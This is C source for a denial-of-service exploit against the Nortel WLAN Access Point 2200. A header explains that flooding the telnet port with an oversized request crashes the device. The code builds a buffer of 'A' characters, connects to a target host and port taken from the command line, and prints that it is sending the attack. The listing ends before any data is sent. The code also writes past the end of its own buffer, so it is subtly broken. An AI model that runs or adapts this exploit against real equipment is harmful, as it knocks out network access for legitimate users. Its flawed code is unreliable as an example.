/* WLAN-DoS.c
*
* Nortel Networks Wireless LAN Access Point 2200 DoS + PoC
* discovered by Alex Hernandez.
*
* Copyright (C) 2004 Alex Hernandez.
*
* A successful attack on a vulnerable server can cause the AP
* (Access Point) listener to fail and crash. The port 23 (telnet)
* functionality cannot be restored until the listener is manually restarted.
*
* LAN AP 2200 permits client-server communication across any network.
* LAN enables by default the port 23 (telnet) and port (80) for administering.
* Debugging features are enabled by default, if LAN AP encounters such a request,
* it will crash and no longer field AP requests from authorized clients.
*
* Simple lame code by
*
* -Mark Ludwik :Germany
*
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/types.h>

int main(int argc, char *argv[]) {
if(argc < 3) {
printf("\nWLAN NortelNetworks AP DoS exploit by Mark Ludwik\n\n");
printf("Usage: WlanDoS [AP/Host] [port]\n\n");
exit(-1);
}

int sock;
char explbuf[2024];
struct sockaddr_in dest;
struct hostent *he;

if((he = gethostbyname(argv[1])) == NULL) {
printf("Couldn't resolve %s!\n", argv[1]);
exit(-1);
}

if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket()");
exit(-1);
}

printf("\nWLAN NortelNetworks AP DoS exploit by Mark Ludwik\n\n");

dest.sin_addr = *((struct in_addr *)he->h_addr);
dest.sin_port = htons(atoi(argv[2]));
dest.sin_family = AF_INET;

printf("[+] Exploit buffer.\n");
memset(explbuf, 'A', 2024);
memcpy(explbuf+2024, "\n\n\n\n\n\n\n\n", 8);

if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) == -1) {
perror("connect()");
exit(-1);
}

printf("[+] Connected...\n");
printf("[+] Sending DoS attack...!\n");